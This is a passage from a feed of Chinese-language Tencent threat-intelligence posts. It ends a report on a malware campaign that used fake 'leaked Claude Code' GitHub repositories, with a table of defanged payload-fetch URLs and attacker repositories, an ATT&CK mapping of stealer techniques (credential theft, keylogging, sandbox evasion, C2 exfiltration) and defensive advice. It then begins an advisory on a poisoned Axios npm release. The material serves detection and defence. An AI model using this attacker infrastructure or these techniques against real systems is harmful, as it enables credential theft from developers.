href="https://pastebin[.]com/raw/csi5UqpE" target="_blank">https://pastebin[.]com/raw/csi5UqpE</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OneSync.exe 远程载荷拉取地址</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">远程载荷 URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://pastebin[.]com/raw/fTxiyhbL" target="_blank">https://pastebin[.]com/raw/fTxiyhbL</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OneSync.exe 远程载荷拉取地址</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">远程载荷 URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://snippet[.]host/wtbtew/raw" target="_blank">https://snippet[.]host/wtbtew/raw</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OneSync.exe 远程载荷拉取地址</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">远程载荷 URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://snippet[.]host/iqqmib/raw" target="_blank">https://snippet[.]host/iqqmib/raw</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OneSync.exe 远程载荷拉取地址</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">恶意仓库</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://github[.]com/leaked-claude-code/leaked-claude-code" target="_blank">https://github[.]com/leaked-claude-code/leaked-claude-code</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主诱饵仓库</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">恶意仓库</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://github[.]com/my3jie/leaked-claude-code" target="_blank">https://github[.]com/my3jie/leaked-claude-code</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">镜像仓库</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">恶意仓库</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://github[.]com/idbzoomh1" target="_blank">https://github[.]com/idbzoomh1</a></span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">攻击者账户</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="257" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">六、ATT&amp;CK 技术映射</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2528px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">战术</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">技术</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">编号</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">描述</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">初始访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">通过网络服务投递</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1189</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">通过 GitHub 恶意仓库分发载荷</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">执行</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">用户执行</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1204.002</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">诱导用户运行伪装的泄露代码</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">持久化</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">注册表 Run 键 / 计划任务</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1547.001 / T1053.005</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">通过多种方式实现开机自启动</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">防御规避</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">虚拟化/沙箱检测</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1497.001</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">多维度环境甄别，命中即退出</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">防御规避</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">反调试</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1622</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">黑名单进程检测、调试器标志检查</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">防御规避</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">混淆/加密载荷</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1027</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">RC4 加密内嵌载荷、内存解密执行</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">凭据访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">浏览器凭据窃取</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1555.003</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">窃取 Chrome/Firefox 等保存的密码</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">凭据访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">键盘记录</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1056.001</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">PureLogs 键盘记录功能</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">采集</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">屏幕截图</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1113</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">系统屏幕截图捕获</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">采集</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">剪贴板数据</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1115</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">剪贴板监控与劫持</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">命令与控制</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">应用层协议</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1071.001</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">HTTP/HTTPS C2 通信</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">数据渗出</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">经 C2 通道渗出</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1041</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">窃取数据经 C2 回传</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="276" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">七、总结与防御建议</span></h2><p data-line="278" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">本次攻击事件展现了一条成熟的 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">&#34;热点借势 → 社工诱饵 → 多阶段载荷 → 商业窃密木马&#34;</span></strong><span leaf=""> 攻击链。攻击者具备以下显著特征：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">时效性极强</span></strong><span leaf="">：在 Claude Code 泄露事件发生后</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">数小时内</span></strong><span leaf="">即完成投毒仓库搭建与 SEO 推广</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">载荷冗余投放</span></strong><span leaf="">：同一载荷以不同文件名散布于多个系统路径，提高持久化成功率</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">多木马组合</span></strong><span leaf="">：同时部署 PureLogs、AuraStealer 等多款商业窃密工具，最大化数据窃取覆盖面</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">反分析能力完备</span></strong><span leaf="">：具备成熟的反 VM、反沙箱、反调试机制，阈值累计评分模型增加自动化分析难度</span></p></li></ul><h3 data-line="285" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">针对开发者</span></h3><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">严禁下载或运行</span></strong><span leaf="">任何声称是&#34;泄露 Claude Code&#34;的 GitHub 仓库代码，仅通过 Anthropic 官方渠道 获取工具</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">不在不受信任的代码库上</span></strong><span leaf="">运行具有本地 Shell / 工具访问权限的 AI 代理</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">审查 npm 依赖</span></strong><span leaf="">：关注异常包更新，等待官方签名二进制发布后再升级</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">隔离开发环境</span></strong><span leaf="">：使用容器或虚拟机运行来源不明的代码</span></p></li></ol><h3 data-line="292" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">针对企业安全团队</span></h3><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">封堵已知 IOC</span></strong><span leaf="">：将上述文件哈希、C2 地址、恶意仓库 URL 加入安全设备黑名单</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">终端监控</span></strong><span leaf="">：关注 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\*</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\ProgramData\*</span></code><span leaf=""> 等非标准路径下的可执行文件创建</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">网络侧检测</span></strong><span leaf="">：监控对 Pastebin、snippet.host 等公开平台的异常外联，以及 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.cfd</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.shop</span></code><span leaf=""> 等新顶级域名的 C2 回连</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">开发者工作站</span></strong><span leaf="">：排查是否存在上述 IOC 中的文件路径与进程，检查注册表 Run 键和计划任务</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">零信任架构</span></strong><span leaf="">：优先隔离关键应用的访问权限，限制开发环境的横向移动能力</span></p></li></ol><p data-line="300" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对AI agent相关安全风险，腾讯推出多场景安全防护矩阵：</span></strong></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.96875" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100027838" src="https://wechat2rss.xlab.app/img-proxy/?k=3d3f4197&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXSDrAQ3X6hgsw21icuuHGxLUTLwndXSXq2kpRVD6ibxkiczLtDPcLgbMzDAibaicKCTeNDiaYokUAiaSVyLOKLtothElVXqC8942icfpA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p data-line="303" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=43f10873&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511607%26idx%3D1%26sn%3D67a18e00bf624c50e18463ca7ca4f5b5">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 03 Apr 2026 14:30:00 +0800</pubDate>
    </item>
    <item>
      <title>高危风险提示｜又是供应链攻击！Axios npm包遭投毒，请尽快排查处置</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511532&amp;idx=1&amp;sn=a64a348704fcf6aa7289964294b7c0c9</link>
      <description>Axios npm包遭供应链投毒，恶意版本植入RAT木马窃取凭据，请速排查处置。</description>
      <content:encoded><![CDATA[<p><span>腾讯安全威胁情报</span> <span>2026-04-01 12:37</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=439bcf4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwWNGXYuPDfr3suDjpKATsML8z3q9nTChtLLp1xRibOZOwS1gc52VjzUPcUuiaZe7WCpc6XuUEibL3KgIB0kSlibbe7PicGPqXzOVV8E%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>Axios npm包遭供应链投毒，恶意版本植入RAT木马窃取凭据，请速排查处置。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, &#34;system-ui&#34;, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><p data-line="0" style="margin: 0px 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">近日，腾讯安全团队在腾讯iOA产品上监测到 Axios 被被曝出存在供应链投毒风险，攻击者可利用该投毒包自动下载并执行远程后门脚本，实现远程控制、该木马可窃取开发环境中的各类密钥和凭据，并通过 C2 服务器实现远程控制、植入持久化后门等危害。</span></p><p data-line="0" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf=""> Axios 是 JavaScript 生态中最流行的 HTTP 客户端库，</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">每周下载量超过 1 亿次</span></strong><span leaf="">，广泛用于 React 前端、Node.js 服务端、CI/CD 工具链等场景。此次攻击预谋周密，恶意依赖提前 18 小时预置，三个操作系统的载荷分别预构建，两条发布分支在 39 分钟内相继被攻击，且全程设计了自毁机制以规避事后取证，是迄今针对 npm 头部包最具操作复杂度的供应链攻击之一。</span></p><p data-line="0" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">如果你安装过 axios@1.14.1 或 axios@0.30.4，应立即假定系统已失陷。</span></strong></p><h2 data-line="4" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 16px auto 8px;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;line-height: 1.75em;"><span leaf="">事件概述</span></h2><p data-line="5" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">攻击时间线如下：</span></p><p style="text-align: center;line-height: 1.75em;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.3924050632911393" data-s="300,640" 